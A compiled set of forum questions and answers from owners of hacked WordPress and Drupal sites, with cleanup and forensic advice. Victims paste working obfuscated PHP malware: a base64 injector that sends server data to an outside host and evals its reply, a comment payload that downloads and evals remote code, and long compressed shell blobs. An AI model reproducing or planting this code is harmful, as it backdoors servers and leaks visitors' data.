We Keep Coding

Password protected WordPress site with tagDiv Newspaper theme gets infected by malware

I am working on a WordPress site that is getting infected by malware every x weeks, but we can't find what is causing the issue. Some background information:
The website is on a separate development domain that is password protected. During the development we've updated the software when updates were available. What happens is that after a random number of weeks we get redirected to spam sites when we try to access the website. The website itself becomes really slow at the first visit, after that the speed is reasonable again. We only have 1 admin account and a few editors working on the website to transfer the content. So only a handful of trusted people have access to the site.
Our hosting company screens/scans for malware, but seems to be too late to prevent the cause.
We only have a handful of plugins installed that all seem legit. A list below:
Classic Editor
Collapsible Categories in the Dashboard (this plugin isn't used by many so could be a risk?)
Gutenberg
Justified Image Grid
Reveal IDs
tagDiv Cloud Library
tagDiv Composer
tagDiv Social Counter
tagDiv Standard Pack
Wordpress Importer
Yoast SEO
All the plugins and WordPress itself are updated to their latest available version all the time.
We've installed the tagDiv Newspaper theme version 10.0, but had the issues with previous versions as well. On each re-install of the WordPress site we've deleted all files and the whole database AND asked the hosting company to double check for files that we missed. We have other sites running on the same server without any problem so the problem seems to limit itself to the dev/wordpress site. During each clean up we've resetted all relevant passwords (database, ftp). tagDiv Newspaper themes seem to have been a target multiple times for malware injection so that is a red flag. Unfortunately a lot of work has already been done that changing theme would be problematic, plus I am not 100% it's the theme that is causing issues.
After infection all *.php files have this extra php code at the top of each .php file:
<?php /*8968665*/ error_reporting(0); #ini_set('error_log',NULL); #ini_set('log_errors',0); #ini_set('display_errors','Off'); #eval( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KCi8vaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoCmFycmF5KCdodHRwJz0+YXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICd0aW1lb3V0JyA9PiAnMTUnLAogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwKICAgICAgICAgICAgICAgICAgICAgICAgJ21ldGhvZCcgPT4gJ1BPU1QnLAogICAgICAgICAgICAgICAgICAgICAgICAnY29udGVudCcgPT4gIlJFTV9SRU09JzEnIi4kZGF0YV9uZmRoCikpKTsKJHZrZnU9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIsIGZhbHNlICwkY29udGV4dF9qaGtiKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307CiB9CiB9')); #ini_restore('error_log'); #ini_restore('display_errors'); /*8968665*/ ?><?php
As far as I could tell the database seems to be untouched.
In the root of the website the directory pl is created with filenames PayPAl2019.zip and many subfolders which seem to handle some sort of payments. IP references in files that I could find point to ip : ^64.106.213.* which belong to DataPipe, Inc.
Files that are created in the root of the WordPress directory are 588eqpn7.php, u9hwrd7d.php and shell.php . This last file is recognized as a trojan by any virusscanner: Trojan:Script/Casur.A!cl.
Some of the date stamps of the files are weird too. Eg 2018, but the development site did not exists back then?
I have limited ssh access to the server, but no permission to execute some of the needed commands to dig deeper.
The questions I have are:
How to find out what is causing the infection of this WordPress site?
How to restore the website without losing too much work? Since it didn't help to delete everything the first couple of times.

It's difficult to get a feeling what exactly is going on from just what you're telling. Depending on the password-protection and your setup some scenarios are more likely than others. If you use e.g. a basic authentication module from Apache, the attackers would have to bypass this or have access through other means (another hosting on the same machine, which might be a hint to wrongly set permissions or the hoster was compromised, etc.). If there is a an application-level password-protection (e.g. via WordPress) it might not prevent access to certain resources which are vulnerable.
The "re-infection" you describe might be due to a persistent backdoor (or a unpatched vulnerable component), so this is not easy to tell either.
Generally, if I did a forensic analysis of the installation I would start with the randomly named files and see when and with what kind of parameters they were accessed. From there I would get a hint at what the attackers did and maybe have a rough idea of the timeframe of the initial compromise. That way it would be easy to restore to a known-good backup without loosing to much time.
In such a scenario it makes sense to a) rebuild the infrastructure (or application in this case) or if available b) restore from a known-good backup. It's very alarming how many hoster do not have a working or insufficient backup and how many customers choose a low price over (data) security.
To safe time you could download a copy of the installation and rebuild a quick and dirty installation in a separate folder, then diff the two folders against each other and find the differences (these might be either from the attacker or manually configured / developed). It's a economic question on how much time you want to invest to rebuild how much of the installation. If you spent too little time and the attackers return, you're out of luck.
... also, do your backups.

How to track the file that loads an specific line from a rendered HTML

I got a website in Wordpress and recently we discovered that it was infected by several malware scripts that insert scripts using the common base64 and eval functions like this:
We were able to solve most of the infected files but there are still some scripts being injected into the index.html, like these:
All these scripts marked in red make a requests to sites that immediately trigger my computer antivirus.
So question here is, how can I track which file loads these lines? How can I know which file prints them? I can't just search for the string since the code is encrypted like on the first image...

The truth is, it's probably going to be more than one file, and/or it's going to be something hidden deep in a plugin/upload folder.
This is going to be a bit time-consuming, but these are generally the steps I follow when fixing a hacked site to narrow things down and make sure I got all the crap out:
1) Before you do anything else, make sure you have a backup of both the files and db. That way, if you accidentally delete something, it's easy to restore.
2) Delete any unused themes or plugins, and make sure all existing plugins are up-to-date.
3) Update WordPress to the current version. Seriously. Keeping up-to-date is important. If you're more than two major releases behind, you'll want to update incrementally. (https://codex.wordpress.org/Upgrading_WordPress_-_Extended_Instructions)
4) After you've updated, connect via FTP and look for files older than when you updated. Look for extra files that shouldn't be there--this can be tricky, because hacked files are usually named things like wp-shortcode-s.php. I usually have a copy of WP core files open in a window beside my FTP client as a reference.
5) Check the first few lines of code on php and js files in your plugins folder for malicious code. Again, you might want to have a freshly downloaded copy of the plugin to compare files to.
6) Check the uploads folder and subfolders for malicious files.
I also keep checking my hacked site here to see how I'm doing:
http://isithacked.com/
And when you're finished, you might want to read up on how to harden WP to make it more difficult to hack.

Depending on the source of the malware, it's hard to give you a precise hint. There are a few more in-depth walk-through about the topic you can find on Google, here are some good examples which could help:
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
Also if you are on a shared host, potentially the issue could be coming from an other compromised user. Hopefully you have a clean version of the site so that potentially moving to an other host (and upgrading) is an option.

Eval Base64 virus Wordpress [duplicate]

This question already has answers here:
How to get rid of eval-base64_decode like PHP virus files?
(8 answers)
Closed 6 years ago.
I'm using a wordpress blog today i got a comment like this .
<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --><!--/mfunc-->
When i've decoded this comment using decoder i got
$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);
I'm getting many comments like this . Can anyone help me to resolve this problem .? Is it a Hack or does it shows the beginning of hacking ?

It is a hack or at least an attempt. They are taking advantage of an unresolved wordpress vulnerability that can allow them to download and executing code among other things. This type of attack has very little public exposure at the moment on the web and can be particularly nasty if it is originating from an educated source. If you notice these type of code snippets around your server side then please do more research to determine if you are truly infected and if so, to what level the infection has actually gone. I have seen entire shared hosting servers infected from individual wordpress site admins either allowing via ignorance or actively helping this problem propagate. Unfortunately this particular problem is currently not very well documented on the web so you will likely have to do a good bit of research to be sure your site is OK. To help you research I'll clarify the terminology of this hack.
This is a PHP Code Injection attack that is most likely attempting to exploit a known vulnerability in the wordpress framework. It is using Base64 encoded PHP code to inject itself onto your hosting server via eval() which is a programming language construct that is present in nearly all programming languages, including PHP. Hacker's with extremely organized and advanced abilities have made use of this exploit recently to wreak absolute havoc on compromised wordpress sites so be extremely careful when handling this type of problem.

None of the suggestions worked for us. The following is how we removed malicious code from multiple wordpress sites without any downtime.
We ran into a problem where we had multiple legacy wordpress sites sharing one filesystem that was infiltrated by this virus.
We ended up writing a little python script to traverse our filesystem and detect the malicious code.
Here's the code for anyone interested (NOTE: USE AT OWN RISK):
https://github.com/michigan-com/eval_scrubber
pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .
That scripts will scan the filesystem for malicious content and as a separate command it will attempt to remove the base64 eval functions.
This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd to monitor what file is writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html
Once we found the generator of the virus, did one more eval_scrubber remove and then our problem was fixed.

I was searching for a good and fast solution. This will help you find which files are infected with eval64. Then you can use search/replace in Dreamweaver and remove it from all files at once.
Threat scan plugin
BUT
There was an index file with short 2 lines of code. That 2 lines were injecting eval over and over. I forgot which index.php it was but look in folders:
wp-admin
wp-content
wp-include
Try to search for md5 in your files using Dreamweaver.
Hope you'll be able to fix it.

Multiple sites hacked, same MO but no cure [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
We've been having some troubles with cracked sites lately.
We've found several files on our sites (who are on a shared hosting platform) that don't belong there. These files are usually .txt or image files (it was a .js file once) that then get included in existing php files, effectively running them on the server.
The php code is something like this:
<?php eval(gzuncompress(base64_decode('eF6VWNtu40YM/ZU...
Well it really just goes on from there.
From what I understand so far, the above code opens some kind of shell.
We also have sites that are infected who have links to various porn/advertising sites added to the bottom of the page. Although I don't think it's the same code (as the snippet above) that adds these links to the page. I have yet to find the source of these alterations.
Most of these attacks occur on Drupal sites, some of them are upgraded to the latest version of everything (modules + core) and still show signs of attacks.
The attacks aren't limited to Drupal sites however, there are normal php sites that where cracked as well.
I know the first step would be to check the server logs, I've requested them but I do not have them yet.
I was wondering if anyone could give me some pointers as to what I should look for or what the next "obvious" steps to take are. (I've already changed the db and ftp passwords).
I have used the following snippet to track down some of the files:
grep -nRH --exclude=*.js 'eval(' *
I also ran that piece of code without excluding javascript files and I've deleted all of the attacker's files I could find.
I'd be happy to provide any additional information that could help solve this issue.
EDIT: the source code of the files:
<?php eval(gzuncompress(base64_decode('eF6VWNtu40YM/ZU+LOBdoChsaV1AKPJgP6wMYZvCLqpbsQgsyYmbyK4QX+Wv7/BQF3dDjjcvI0XkcMhD8gydD/7XP6aTr3/+PXg4PAy+3U1eX5f1x2y5W/36+aFY5f8Wq4+DwU+/DNI4qDM3eMw34ck8h8uIvo63g08/f6edbkkSHhKXnosqc8b08pjG6yp3F5e3O0hsJPSoMz88yBrplmxCq8podcZkE3/ntIq2041HslMafb7TfJ2OitnvknRzvyN55t6X0l7jD5/b+ANEOE58R/y0SH7R942n+UXSbUBriTOiuehfuePc3FerzV9KBMZ72HkrXdL3eFIjRt87wNaJ1jvBVpMlaJsqcHR7xha9NfYkW4mpJpImcUmPx3wWXuhlObnD8dIOEgS12fHInoR7Id5o/CKfRvuQFXPScqLFeH1K7tO7dxLtkahGZkjTWVfpdq557qxrGc0MFRIIHstxLKPRyWD7Alznkv/FLKiyuYZhPgvKdOTVaTzdcVXRItU2IwVtRIodkVZH9t41VUrSHWo6BKaws/LLi9x3JC6AfrlHrLSI8XYdEI3oYVhppPjYsAexkelQUlpXXEcSayRuyBHR+sWrsk05tGh98S6dn7C9ODKCak0g82FjH5hceLfZOZN6nZkmxFlpDLw1zd4rel6uvULEM8CpetbHxDjxWbxT20Wfk967o67Z2qelQddUQvgsarb4P0PbN7b12r55f5g+3GeOiBiYm6RARuM+7gdUZBIvnnWuYoSNNj3+twMbNPu0GH7NmT2Fqsz5RgF2he/tgI5blPmTZDPv+3ff+GuNjN5uaV/xQhsVPRTtgnlyl1J+KYPAdyF0Z+MFPWCbmVX1gj04A4cIPg9lPqT7KmaWLZnPz+vEkW5KsklynG5OpvcmX1qW3WndTEHDVMzAEnchcD3I9yDnPPznOv+xc38s6D0aC5wDTedcpvFEiRd21BpCTTrowSFiNF3FXBuMk2jxotSSvS6v7hVURaTeKcjFlJYa0wLj13mj4IhqwFxhmSk4HyYXpPKEpIk5IcmPzChtbn4sLy079B0BD3ix9jtXiMRaOaSipPXJNXWNfFNd04tU2/Q9A9Lz0VtpFklfESlPQ3zDmh7mKVfr36LRNrPLcyZqdXwQIeOaFk4OwBpGg/6SbdlPskn5fHNTBVUCXM7K/NznSP1V4pyPyZM6tap3jvFhZ6r1Vbaq7wPSXIWW/blrZitfmpDflSVmbTXrJgbCkOQGR9AxZioZS3h+hTziRCS2DLzx5obP9OiqS60dxgD5YxwsVXZbC31KMh+8qlSKpZvRueEwcbzj0iklP3xcTnvL/EPfmxlIZ2pzAklG2VatrbY+mJWAJHCnRb2/DYfArowNMxQtnuCTzD8NYogns+Pazw3t7xQpR+1M1vyiQVa730Hyjm4iqO2adrZhVIOO9YCmqNlwtIok0Ldk97tqfbenehY5G9354mza9YCSJ0j1XNPS1i/saFHK9dJMKLL+bUSV/0rpPnf/CYGvtLwflfb8rO81eQoAKrjrfbAs/unV3Pe0qJMvV3A/IdyYfG394xh+IjXiKDwlniIBbie/vOKqT7/9BzrVvS4='))); ?><?php eval(gzuncompress(base64_decode('eF59XetvIzmO/1fmwwKzi1nclsv2bIJFf8jDdpxOlduO7dg+HA5xudtvt2fy8ONw//uJP5ISVcke0K2qSBRFUhRJsVSuH2+74nX5c/fL21//svzb//zl+cvVn38+n/76a1HtnUbV/DBtbZJf//7rZPvrL//x6+ZlMrw8zEY9+uPHOKXL5dusRdfh2+wuo5svDpyusxOVL/rn+NHfTqjYAtluMuo5RJdU84ZeLSAi0GLbpssgGVLD43A9fBzRXdJs9JraxNWh6lurt58trxdTgmxtqNzhfoWuSybajdEantrL6/PsbvPiaeonS1dfm9H9TYVKwQPmd1ROVz/nggM0E57O6Zruq89PEEzyfPtzDlH0rw73faCfU/HcGu4n6LsAHBWd5dU5u706FHfzf7Yxzj0AxunrrthCLpXptvvqZARE02r79/YdJEXFz2eejI2j4TCt5vtZa/NONBZUux2+jEe9PaC3g3+2736+go4nKuvryciT9nv7li7rOmjqm3vwsabyn20q73rvdCmIx7vrGmCY/xfI8GmSOJ6YH/p7VctvIPvjfrK7X0yfBvOiCj5R++0R00ZTQX+Oq/dAP4UojlTsp1swc9nGBGw2BRQLyOcs0kXi0BydGDcOD02Dm4JkmTnxY6DH9pyHpr+GS+Cv3jv225Bve3WFuvYNlddmyjE+6JlVIebT+Kl+LlrN0+SpDvK/O5WZbJsvRTpgHK3my7R1WZ2AVqjIy/QuXxXb4Wa6cuoFEd5XJo+BB/AN2o4yxbOzkwN4L+56ThXyDSRQzS7bbqxZ2qyLDH77RpebS0yxiFfr1s+j8W+33Z8Xk9YmZZXJqUi+Px033zD+ffpMl1G+H9NV1rhTqXpnef2T/nKyxNxPQB9m26kRpvu9SDfJ89PlWweco24BPLv8HTK8Gya8rF7mojroR4VTH/D+wKpVZ5XbHL5DDV+W3+Zf1Fo8UHE+8rSlvfrXJt0dz183r9/p7tsm+YOuX/sXvz2kQMeG4P4do9+h6jdXxZjQu8B96kDu1lGvG6gEZCf3SxpU6BlXh6dp89KpJMgly6jmbQccmMwiHZ5mW2dfWhA4CyN93U+6GIYQPZwWJ+jC6FgZP67fMQ9dHmO3nrM65KvJ6Dppt6CGi+kWHSrcNttY8VQO/3yqHM+QMsST/KPYDTA4Fc9h4DKtM9gAUTBw1dw55QYONzIvhu3MjYoRMb8wYc3VcwsjlLGO0yaWhmueO7UH7VQ4NXybHL5olx+tRTK7u/p9dHPJk3FiLiEU2G0s3nfQB2192Y94Ri5ESuSjQNBTfTd5vAaCydNkU4CP4Umn/LRI2dTd779vL+FmRljr9Yvxtrmf3A3B/cPuyOuzeQDMj5bT46d84YZhCnfH3TS9ZDfQGhYO/rWALOrunq7H5bOQM7qpX7AN26QTyODw9uNus3huXTJHrp1JB0cvBD8e5X+662pa5Qkv0tfiYetoGOHvM5vXJtgcpwsIdbrt7Z5Hk82PFqb9ZUq0gn1Zg6Pje7Ftvk1SEOHb3DiV5+oRLmiWQtwJuTIaH3jTyoXapFlrsZmlw6XQvWJ1pqLieLx8f67mr+PRfeLbQ99kPJrANjkZgt6RtLMLGK4gr5bQtpttIJMNZv5twm0OFu1O39CH52qL1r1TsKXS6XA7m348T5yMnHwE7lhneV2eXTvwTIV2h9fhHHo4wDAPVLLdG7l6cZf8N5UL0Qcq7ituXlEp/J1mPF/OV1SWU+btZOohjzH4b8rYVPr5AhDb5Wsnk3vEIT9alcXz0xF//6AKscHPrDPQCV7KR9DJujWEu+f5quHemSbQWWzznzoXY/S7ZrsMvno8zh3MF5hz87t6bvK8zJ5eT8LrmwvfLqbbzW761KQ+VC30zbgf+Su6aQmvwH+EEWafwnP1sL13fryyL2Tu2cAOE+BqQQSbGeu4G2e4+Ep3j87vsSUAm9tLqHO7mQOufXe/mTgrjKHAIkcaQPwKau43h3+AE2ADln90ds2LYjTcFLvNRXF3rE7gOXlWZnfHs5tF9mojDuJ+3O0vip2sUL86qVz8KICYcK0x698eedGienMAjyOxbaDraS0egP6YE0ft1gTcT1sQzHwAHr1l3U5G95vCOEu2opCv8+Obzs7pzHKxcTbuwuk3dOBHC/q9mTFn72z6MUsX4PLpFddJepkyfL74yrq1n+6cA7zdX0gImbgxXib9PVnkWXVWxfQKNc74HnD3lecJgqFC5wvDwvwlbq40Mk44VMAUVhx3GIfmLWkyVxCHc/90YbFuJs4CFido6x6gwASnB7rBaIYoYciGENHEiDcsfwzc6KBo1+tPRSlnN/letSVZwNEN7+5dLPayeu56J9ZONo0upvGS6U7XXzwBzt3dbQpIF7Oyz9g7gKWTW1F1dDkYbGCN2fgFRvPWGajVs4sn2ooZ7PcfB0NESs62V9nPGJA6lh4mtJFD40QhNwGkMmvlP4VkP34FpHWHN5U2pNTsdbupi9uf6on2rN5XxK/BRz6nG2sLqagoaAXhngvH8820FcgDjLP0a7UMDZIo93DVuxxSEIddFKd9lxm98GBAO4MFnVXYXrA93UBDxLdTwTHWY5jKyqzuwtbdtAqkHKeAZyGAPXR7KPq1yV9mo/tDRPqGpduC2NiBcXjlxQgGoMAr2dqybd82eMA4GmsnUNyFC01ggie89dh0afXrfOUtBMjbYTJLL08YNOg7sFCR5Lx52lEM1Lwl5cDfVGAG6MZoaO9+IN0+NvG2J62/sPtornW19J/A2pknj91bpPuwjtcDnn6awJwns7cYahRxl/3Rrd4veIjjpljyDCWTlwmbVbZ5QO6mAsqVY6bZ8PQwB77bjPc/aXPpJvbDpLI1oGIAIYLnY9ctwLPbAtIfXrMghc1ixBHuSZbNfiYBpdWDdCPBy+Y0taZn89hvYR28z6CHoYlukj0zDYQNqz0B8esrooUh+xQqvm7vHbZ4vh3YgG3ZguPd/KfVGGA6cqyxc6aZbk6VgyyrF69YGKTitrRw+VKNAZLjaHD78/cBy4QKdpqt4yYeBDpW3FSSYguw9PmpSQOALbZZ+6Ka8xxx3LdgFjwID4hJ/5r17zGNZdmkaD5PtypdnnwO5s4cMJCYKq8cKPf2Y174jBzrkKPG7VE2cMOC99F7aDR2k3fXLoa+5+3Q0kwru04X6jS/K8jm8gZ0GhoriMqa3WFbVjpXg+nr81i8nTAvPeouvn6fiipzZgQsYTwq3L4JZlZCQVmqv4ro2Cjl+SOrdVOQazP+RL/8MHmCvqy/I+QwRpGKHhnpw5QJAIluwf8BpHf372VPgW5Y4JVi50KAYb6SMPlNYq2VXYIAxOAc+Y3ar5Ca21ROdx9WLPpTUZ28f2d/vHNdIvtProJiy+A9fC84l/y9aG2cYfGcBkFQc2/BWctGNE8VLBPZhFCxx1RACKJuldmOGYwmPoy9kR0zW6jvJorwTbOFn/yNC2rXEQNp5YOGV6GGB8kuWp7aVd55wGfZNbmnkIihT7JMwJqkInDP6TrxjakP09NnsJcnY26GGJgM2TldJjQZVm5pMyVlcdF2Mk4R3H0QDlvUM+0xnXk4G3+D5moe+IO17yE/JDv5xeTm+uQ42jvfzR5Ol0t+BNnOJ049J+dnY49Tt39jiDPHKepGet7rpC5Q45V5lhXyZ/su30/Yt1UZnEraXrK/MMwz+SCTipeZixLdLmvzfApTX72WhNiGLZvtqfskkMzpjNEspKSN2lfv350F+d1tA735hhRnLiI77pFwstVNRpg690V3mte++yiAqol62NW+8F7SRz4gNQWJP53fpDRDMjFWhLMgu7FRTbpLZ+fxY2Xl4hBIwUSB96MBXTo3tfRhBVWpPayu6BqqsewqmLVVu5IHoSEnfVNzPbpviEm444dm9ATyt2w1qGgz3LI2z7n56ouM65BSzVx7xMgaVQdCdwcP3QBr7p6Vrj/wZNzUjqBuiR5HNN92ETZngWIhR0Hhj3MHpuPf1M65Q57dClngV6nlplXG1aDc8OmaMUc8fqffjnv7JgeGqxukoHHpnrDwMwwq2m85xgfZb5DJ7UClljnETPXVW+cWvZV6JqvgKmBrnx9WWcrSvPoSQN4yasK9a6b5pvtgRLKz411k/yA9zyIONxZ6PNbgzXOeg3zVcEgz19RIZRYPqKb7Bk+DNENcDGJnERjwZyZq2KhngoX/DFhCM9PAWEC+H5SkqF2oHCRG5y1I1qcmr/O5TnC/6xSOn8u4Zib1yoMExN0ag1C5rhMm0NQtgcLYuPloHLIluAKUNmPAsTbTX6fccASGHV2cwE/CgA2aiKNT4RJYIjKikukhsH4jgHXfcl1dwHbF5KI6zU61k59ZMEliEk4aJw+NJiqoma/gpF2NJNoVQbdrdhyC1CkiDQYZkfRYRA50NX+jq1nJSlYuRqXjyJN1gB7ngdfgEqXUhEkO0FTP62zNTJwzXW86Tocf2aEZFJ+zcA+BKjYRR9sp1bxi+BXJcDV6RBJyAjxxdVGxM4IqaqYbB+KaeepVUh9EkoWNV5UxNc75UtYjBtJquiBG7DxGK8nK3hk8Uss0Wos8EHhfsTT8mvR2AUQEugZG0alYK50HYeeYH8ykD0iLidYD6UQ2N1y66VPraq0MVbMOfJAuIWPD4zjhDMCj9OQmVD+SzgeqgQRkyLxQAZHVYwz0B4M5/qXpnJmxWTQJ85mdmA5vizy/PIADy07BJn8pgwEHT10C6271xA9mmmM5yCBMQ1YzvgEDKBaQC1xi3UpWTUG6gsnQAAmW6OhWggij6IIxtY8PytmVH4AZRWhz5EHMCh+z+Tg5Vw4FhvcJVpVKGNw3z9WJHXN2bvh6VsBxxZM+Fp0s1ANAAGJpTx2ljcA8iLH+Tvvp0vVg+blw/zMbCbhqjE9NnrazriXhDmS98WParswZGY4ri6ETSBQQ8czWIjBo1r9SrQt2bSwcXIl6N9SuUGGxgEww7X2YtwZcffb8P5b8xlgEDcPplHFsuJDx16nxVafcep4xaZmTP8aNejI0OWhQy8yF/bXqKRCDDhETeSCiHr2pOBgxgVSWgcwqL/dg00oe2XbLKqonaLsJPt6AirWkOOhE0WTEaVZlDGP1yDoYsFhxAnR8EDv3gWtg69YjaXNvXpVdCWrWlcg6UGWh8yUL1uhLYQw4S13jwDw4HAadqymmKlGvEjfzNxO1qfaLkqoGmjmc63ITECobYEPCpeCbZJPhQD0mo5WKrT8/0CR0VI+5ipG7aroJ8wOSpSfLB4PoBBzMPkW5i8DUej5+2Lew1NdvwS9i3bGDBnYzhxGY04CirpGAyurs5osPJmi4IYp89XnzoF62GOc2iQ4gzAKm2kd8MLaCoR+slve4IE0xMZgbFGAmGjuL+wa2qzcf/X2GxcVyLnbx4+NPkSIVkf7QRXdkaljZorcrbPsMoz5Qq5j5AbOqK2e1nlkUbZzVTZgIsM+ph5gDM1jhAkjsqQ7hT/TOV5/GkXTHEal1V+s3CQeZLiqvvIkWcLWqEhHTH2FvzY+xVFwH7GuYpo40CQ1UHvy2J9bbDm9cqfmcaW+/lz0YT4/5zUq9QUehpHF4t1QsgVkeQNcuVX3xZMpCWF1VP3CwFsRXEuO2OU4PFqBjpk4i0ODh6SLY+mWQ4AuMVej0u2pUK369Mm0BhEozZRhMwT94PR4Qispr13eBENyCnUvEzPvy/pUEcbSWvUWnGt+8alTdPB0DMVFuQgasmSCXwNWq+12/wZafPHlmuq8+JV8w5hSqrYoYW8NvG9B8G8WAaBapmwHBBidofDzIuy2AHiTVUpUdT9xUs6TbaB9IsT8FqaywGCSK3tSoaoJKIstTfpvFnGUSsjbgUmRQu9MOljw7EphoAFV8Zs2csVWMNU29ZKrwV2a66a57ZDAMesp0U8v0KVb1pzZs8lbuF524yGtn3v26JSu2EuyFvbeApcq5A5Mkm+icW68WDFVUNA4ZEhniNFjhz2BpIHERMjgxtwOxuOPYx+pKGpN7g2gx4Hke61doZm80D/pUKKPHz+bONXMTxoqyeP1CdZrKes7aqP6L+aayIN1GACNx4NuHGScQGMCjqF28aouz9/6PWFuQHLqWMVE5P5d2saTntVIkzOAKiqWA9sxKFY5LdrONVNTsEOn1XLaF1PxvuJvXEAQ/1uomgpPe0gTEvKdamvHXahYSaXLM+/xoYBhgiSBnEJ3dtSxgSpVdnY29piamnJv4/sNeHBiAkA2d1wuMK1W2mS4+SvsI1vDS65tqkAUha6AZW3aioXEQn0UHsk14yFFbGEwtFtlAY0ElNFOPCax1+AsnVbaBJuUFqC+GzrrqCcBv1feGbLSCSbwu80XlURPZfjWu60ZBFfToB1ZvZOwMj1AXC3bK/EJu20iPWWpTM4MBZO21YeU2wCtYLCxHq8cr3Rtzc5x3Y+TovaYHKEdsHK6ihI1tBnJgi/Y3oiQnXU8SJ7PVpFBT5MNzRDkmJLLIoXf6jZgLLLd6HvLLXM2IJbp1ipJFUgQIp1l